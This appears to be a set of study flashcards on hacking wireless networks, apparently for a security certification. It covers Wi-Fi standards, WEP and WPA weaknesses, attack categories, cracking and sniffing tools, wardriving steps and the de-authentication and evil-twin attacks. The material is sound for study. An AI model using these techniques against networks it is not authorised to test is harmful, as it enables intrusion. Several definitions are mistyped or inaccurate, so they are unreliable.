16. Hacking Wireless Networks
Authentication Attacks
PSK Cracking LEAP Cracking VPN Login Cracking Domain Login Cracking Key Re-installation Attack Identity Theft Shared Key Guessing Password Speculation Application Login Theft
Direct- sequence Spread Spectrum DSSS
spread spectrum technique that multiple the original data signal with a pseudo random noise spearing code.
EAP
supports multiple authentication methods, such as token cards, Kerberos, certificates
AES
symmetric encryption used in WAP2 as a replacement of TKIP
Aircracking -ng Suite
www.aircrack-ng.org Airbase-ng - capture WPA/WPA2 handshake and can act as an ad-hoc Access Point Aircrack-ng - Defacto WEP and WPA/WPA2-PSK cracking tool Airdecap-ng dectype WEP/WPA/WPA2 and can be used to strip the wireless headers from Wifi packets. Airdeclock-ng removes WEP cloaking from a pcap file Airdriver-ng provides status info about the wireless drivers on your system Airdrop-ng this program is used for targeted, rule based de-authentication of users Aireplay-ng used for traffic generation, fake authentication, packet replay, and ARP request injection Airgraph-ng creates client to AP relationship and common probe graph from airodump Airodump-ng used to capture packets of raw 802.11 frames and collect WEP IVs Airoliib-ng store and manage essid and password lists used in WPA/WPA2 cracking Airserv-ng allows multiple programs to independently use a wifi card via a client server TCP connection Airmon-ng used to enable monitor mode on wireless interfaces from managed mode and vice versa Airtun-ng injects frames into a WPA TKIP network with QoS, and can recover MIC key and keystrim from wifi traffic Easside-ng allows you to communicate via a WEP encrypted access point AP without knowing the WEP key. Packetforge-ng used to create encrypted packets that can subsequently be used for injection Tkiptun-ng creates a virtual tunnel interface to monitor encrypted traffic and inject arbitrary traffic into a network Wesside-ng incorporates a number of techniques to seamlessly obtain a WEP key in minutes
WEP
Encryption algorithm for IEEE 802.11 wireless networks Security protocol uses a 24 bit initialization vector IV to form stream cipher RC4 for confidentiality and the CRC 32 checksum for integrity of wireless transmission
802.11d
Enhanced version of 802.11a and 802.11b. The standard supports regulatory domains. The particulars of this standard can be set at the media access control MAC layer.
Weak Initialization Vectors
1. in the RC4 algorithm, the Key Scheduling Algorithm creates an IV based on the base key. 2. the IV value is too short and not protected from reuse and no protection again message replay 3. a flaw in the WEP implementation of RC4 allows week IVs to be generated 4. the way the key stream is constructed from the IV makes it susceptible to weak key attacks 5. those weak IVs reveal info about the key bytes they were derived from 6. no effective detection of message tampering 7. an attack will collect enough weak IVs to reveal bytes of the base key 8. it directly uses the master key and has no built-in provision to update the keys
Discover WiFI Network Using Wardriving
1. register with WIGLE and download map packs of your area to view the plotted access point on a geographic map 2. connect the antenna, GPS device to the laptop via a USB serial adapter and board a car 3. install and launch NetStumpler and WIGLE client software and turn on the GPS deivce 4. drive the car at speeds of 35 mph or below (at higher speeds, wifi antenna will not be able to detect wifi spots 5. capture and save the NetStumbler log file that contains GPS coordinates of the access points 6. upload this log file to WIGLE, which will then automatically plot the points onto a map
TKIP
A security protocol used in WPA as a replacement for WEP
Availability Attacks
Access Point Theft Disassociation Attacks EAP-Failure Beacon Flood Denial of service De-authenticate Flood Routing Attacks Authenticate Flood ARP Cache Poisoning Attack Power Saving Attacks TKIP MIC Exploit
WiFi Traffic Analyzer Tools
AirMagnet Wifi Analyzer http://enterprise.netscout.com
Wifi USB Dongle: AirPcap
AirPcap adapter captures full 802.11 data, management, and control frames that can be viewed in Wireshark for in depth protocol dissection and analysis AirPcap software can be configured to decrypt WEP/WPA encrypted frames
Wardriving Tools
Airbase-ng https://aircrack-ng.org MacStumbler www.macstumbler.com AirFart https://sourcefart.net 802.11 Network Discovery Tools https://sourceforge.net G-MoN https://play.google.com
GPS Mappingq
Attackers create map of discovered WiFI networks and create a database with statistics collected by WiFI discovery tools GPS is used to track the location of the discovered WiFi networks and the coordinates are uploaded to sites like WiGLE Tools: WiGLE Skyhook
BSSID
Basic Service Set Identifier.
Dipole Antenna
Bidirectional antenna, used to support client connections rather than site-to-site applications
WEP Issues
CRC32 is not sufficient to ensure complete cryptographic integrity of a packet IVs are 24 bits Known plaintext attacks Dictionary attacks Denial of Service Eventually, an attacker can construct a decryption table of reconstructed key streams A lack of centralized key management makes it difficult to change WEP keys with any regularity IV is a value that is used to randomize the key stream value and each packet has an IV value The standard does not dictate that each packet must have a unique IV, so vendors use only a small part of the available 24-bit possibilities Use of RC4 was designed to be a one time cipher and not intended for multiple message use. An attacker can construct a decryption table of the reconstructed key stream and can use it to decrypt the WEP packets in real time.
WEP Cracking
Cain & Abel is password recovery tool for Windows. The WEP cracker utility in Cain implements statistical cracking and the PTW cracking method for the recovery of WEP key.
WPA Brute Forcing
Cain's new version also ships routing protocols, authentication monitors and routes extractors, dictionary and brute force crackers for all common hashing algorithms and for several specific authentications, password/ hash calculators, cryptanalysis attacks, password decoders, and some not so common utilities related to network and system security.
Bluemacking
DOS attack which overflows Bluetooth enabled devices with random packets causing the device to crash.
Integrity Attacks
Data Frame Injection WEP Injection Bit-Flipping Attacks Extensible AP Replay Data Replay Initialization Vector Replay Attacks RADIUS Replay Wireless Network Viruses
802.15.5
Deploys itself on a full mesh or a half mesh topology. It includes network initialization, addressing, and unicasting.
Bluetooth Modes
Discoverable Modes: Discoverable - other devices are visible to other Bluetooth enabled devices. Limited discoverable - it is onoly for limited period, specific period, or during temporary conditions. Non-discoverable - devices do not appear on the list during a Bluetooth. Pairing Modes: Non-pairable mode - device reject the pairing request sent by any device. Pairable mode - Bluetooth device accepts the pairing request upon request and establishes a connection with the pair requesting device.
Confidentiality Attacks
Eavesdropping Traffic Analysis Cracking WEP Key Evil Twin AP Honeypot Access Point Session Hijacking Masquerading Man-in-the-Middle Attack
WEP/WPA Cracking Tools
Elcomsoft Wireless Security Auditor www.elcomsoft.com WepAttack http://wepattack.sourceforge.net Wesside-ng www.aircrack-ng.org
Launch Wireless Attacks: Evil Twin
Evil Twin is a wireless AP that pretends to be a legitimate AP by replacing another network name Attacker sets up a rogue AP outside the corporate perimeter and lures user to sign into the wrong AP Once associated, users may bypass the enterprise security policies giving attackers access to network data Evil Twin can be configured with a common residential SSID hotspot SSID and SSID company's WLAN
Types of Wireless Networks
Extension to a Wired Network Multiple Access Points LAN-to-LAN Wireless Network 3G/4G hotspot
De-authentication attack
Force the connected client to disconnect, then capture the re-connect and authentication packet using tools such as airplay, you should be able to re-authenticate in a few seconds then attempt to Dictionary Brute force the PMK
Frequency-hopping spread spectrum FHSS
Frequency Hopping Code Division Multiple Access FH-CDMA, method of transmitting radio signal by rapidly switching a carrier among many frequency channels
802.15.4 ZigBee
Has low data rate and complexity. ZigBee transmits long distance data through a mesh network. Its data rate is 250 kbit/s.
Wireless Traffic Analysis
Helps in determining the appropriate strategy for a successful attack Attackers analyze a wireless network to determine broadcast SSID, presence of multiple access points, possibility of recovering SSIDs, authentication method used, WLAN encryption algorithms Attackers use WIFI packet sniffing tools such as Wireshark, SteelCentral Packet Analyzer, omniPeek Enterprise, CommView wifi, to capture and analyze the traffic of a target wireless network
Service Set Identifier SSID
Human readable text string with a maximum length of 32 bytes. SSID is a token to identify 802.11 WIFI network. It acts as a single shared identifier between the access points and client. Security concerns arise when the default values are not changed, as these units can be compromised. If SSID of the network is changed the recognition of the SSID on every host is required. A non-secure access mode allows clients to connect to the access point using the configured SSID, a blank SSID, and a SSID that configured as any. The SSID remains secret only on the closed networks with no activity that is inconvenient to the legitimate users.
Wireless Standards
IEE Standard 802.11 has evolved from a basic wireless extension to the wired LAN into a mature protocol that supports enterprise authentication, strong encryption, and quality of service.
802.11i
IEEE 802.11i standard improves WLAN security by implementing new encyption protocol such as TKIP an AES.
802.16
IEEE 802.16 standard is a wireless communications standard designed to provide multiple physical layer and Media Access Control options. Knows WiMax.
802.11b
IEEE expanded the 802.11 by creating 802.11b specifications in 1999. 2.4 GHz ISM band and it supports bandwidth up to 11 Mbps
802.11n
IEEE is a revision that enhnaces the earlier 802.11g standards with multiple-input multiple output MIMO antennas. Work in both 2.4 GHz and 5 GHz bands. It is for wifi local network transportation. DAB and OFDM.
802.11ad
Involves the inclusion of a new physical layer for 802.11 networks. The standard works on the 60 GHz spectrum.
Bandwidth
It describes the amount of information that may be broadcaster over a connection. Data transfer rate. The unit measuring the bandwidth is bits per second.
RADIUS
It is a centralized authentication and authorization management system
LEAP
It is a proprietary version of EAP developed by Cicso
PEAP
It is a protocol, which encapsulates the EAP within an encrypted and authenticated Transport Layer Security tunnel
802.11i
It is an IEEE amendment that specifies security mechanism for 802.11 wireless networks
WPA
It is an advanced wireless encryption protocol using TKIP and MIC to provide stronger encryption and authentication. WPA uses TKIP to emliminate the weaknesses of WEP by including per-packet mixing functions, message integrity checks, extended initialization vector, and re-keying mechanisms.
802.11g
It is an extension of 802.11 and supports a mazimum bandwidth of 54 Mpbs using the OFDM technology and uses the same 2.4 GHz band as 802.11b.
Parabolic Grid Antenna
It is based on the principle of a satellite dish but it does not have a solid backing. The can pick up wifi signals 10 miles or more.
802.11a
It is the second extension to the original 802.11 and it operates in the 5 GHz frequency band and supports bandwidth up to 54 Mbps by using OFDM.
IEEE 802.11e
It is used for real time applications such as voice, ViIP and video. It defines mechanisms to ensure Quality of service to Layer 2 of the reference mode, the medium access layer, or MAC.
Omnidirectional Antenna
It provides 360 degree horizontal radiation pattern. It is used in wireless base stations.
802.11ac
It provides a high throughput network at the frequency of 5 GHz. It involves Gigabit networking that provides an instantaneous data transfer experience.
WiFI Sniffer
Kismet www.kismetwireless.net Tcpdump www.tcpdump.org SmartSniff www.nirsoft.net
802.15.1 Bluetooth
Mainly used for exchanging data over short distances on fixed and mobile devices. Works on a 2.4 GHz band.
Orthogonal Frequency-division Multiplexing
Method of digital modulation of data in which a signal, at a chosen frequency, it split into multiple carrier frequencies that are orthogonal to each other.
BlueSnif
Proof of concept code for a Bluetooth wardriving utility
Wireless Networks
Refers ti wireless local area networks based on IEEE 802.11 standard where it allows the device to access the network from anywhere within range of an access point.
Reflector Antennas
Reflector antennas are used to concentrate EM energy which is radiated or received at a focal point.
Bluebugging
Remotely accessing the Bluetooth enabled devices and using its features
RF Monitoring Tools
Sentry Edge II www.tek.com Network Manager https://wiki.gnome.org xosview http://xoview.sourceforge.net CPRIAdvisor www.viavisolutions.com sigX www.kratoscomms.com
SSID
Service Set Identifier. 32 alphanumeric character unique identifier given to wireless local area network that acts as a wireless identifier on the network.
BluePrinting
The art of collecting info about Bluetooth enabled device such as manufacture, device model and firmware version
Perform Spectrum Analysis
Spectrum analysis of wireless network helps an attacker to actively monitor the spectrum usage in a particular usage in a particular area and detect the spectrum signal of target network It helps the attacker to measure the power of the spectrum of known and unknown signals Attackers use spectrum analysis tools such as Ekahau Spectrum Analyzer to perform spectrum analysis
802.12
This standard dominates media utilization by working on the domain priority protocol. Speed increases to 100 Mbps.
Directional Antenna
Used to broadcast and obtain radio waves from a single direction
WPA PSK
Uses a user defined password to initialize the TKIP, which is not crack able as it is a per packet keys but the keys can be brute forced using dictionary attacks
802.15
Ut defines the standard for a wireless personal areas network WPAN. It describes the specification for wireless connectivity with fixed or portable devices.
WEP/WPA Cracking Tool for Mobile
WIBR - WIFI BRUTEFORCE HACK https://auradesign.cz WIFI WSP WPA TESTER https://play.google.com
WIFI Chalking Techniques
WarWalking - attacker walk around with WiFi enabled laptops to detect open wireless networks WarChalking - a method used to draw symbols in public places to advertise open WiFi networks WarFlying - attackers use drones to detect open wireless networks WarDriving - attackers dive around with wifi enable laptops to detect open wireless networks
Access Control Attacks
Ware Driving Rogue Access Points MAC Spoofing AP Misconfiguration Ad Hoc associations Promiscuous Client Client Mis-association Unauthorized Association
Spectrum Analyzing Tools
Wi-Spy and Chanalyzer www.metageek.com AirMagnet Spectrum XT https://enterprise.netscout.com Cisco Spectrum Expert www.cisco.com USB Spectrum Analyzer www.tek.com
WiFi Hotspot Finder Tools
WiFi Finder Homedale::WiFi/WLAN Monitor Avast Wifi Finder Open Wifi Open Wifi Finder Free WiFi finder Fing - Network Tools
802.11
Wifi applies to wireless LAN and uses FHSS or DSSS as the frequency-hopping spectrum. It allows the electronic device to connect to using a wireless connection that is established any network.
Mobile-based Wifi discovery tools
WifiExplorer http://nutsaboutnets.com Wifi Manager OpenSignalMaps Network Signal Info Pro WIfiFoFum WiFinder
Wireless Security Layers
Wireless Signal Security Connection Security Device Security Data Protection Network Protection End-user Protection
Raw Packet Capturing Tools
WirelessNetwork View https://nirsoft.net PRTG network Monitor https://www.paessler.com Tcpdump www.tcpdump.com RawCap www.netresec.com
Wifi Packet Sniffer
Wireshark with AIrPcap SteelCentral Packet Analyzer OmniPeek Enterprise CommView for WiFi
Yagi Antenna
Yagi is a underectional antenna commonly used in communications for a frequency band of 10 MHz to VHF and UHF
Brute-Force WPA Keys
You can use tools sucha s aircrack, aireplay, KisMAC to brute-force WPA Keys
OffLine Attack
You only have to be near the AP for a matter of seconds in order to capture the WPA/WPA2 authentication handshake, by capturing the right type of packets, you can crack WPA keys offline
Wifi Discovery Tools
inSSIDer Office www.metageek.com
WPA2 Enterprise
it integrates EAP standard with WPA2 encryption
CCMP
it is an encryption protocol used in WPA2 for stronger encryption and authentication
WPA2
it is an upgrade to WPA using AES and CCMP for wireless data encryption. Is upgrade to WPA it includes mandatory support for Counter Mode with Cipher Block Chaining Message Authentication Code Protocol CCPM, and AES based encryption mode with strong security.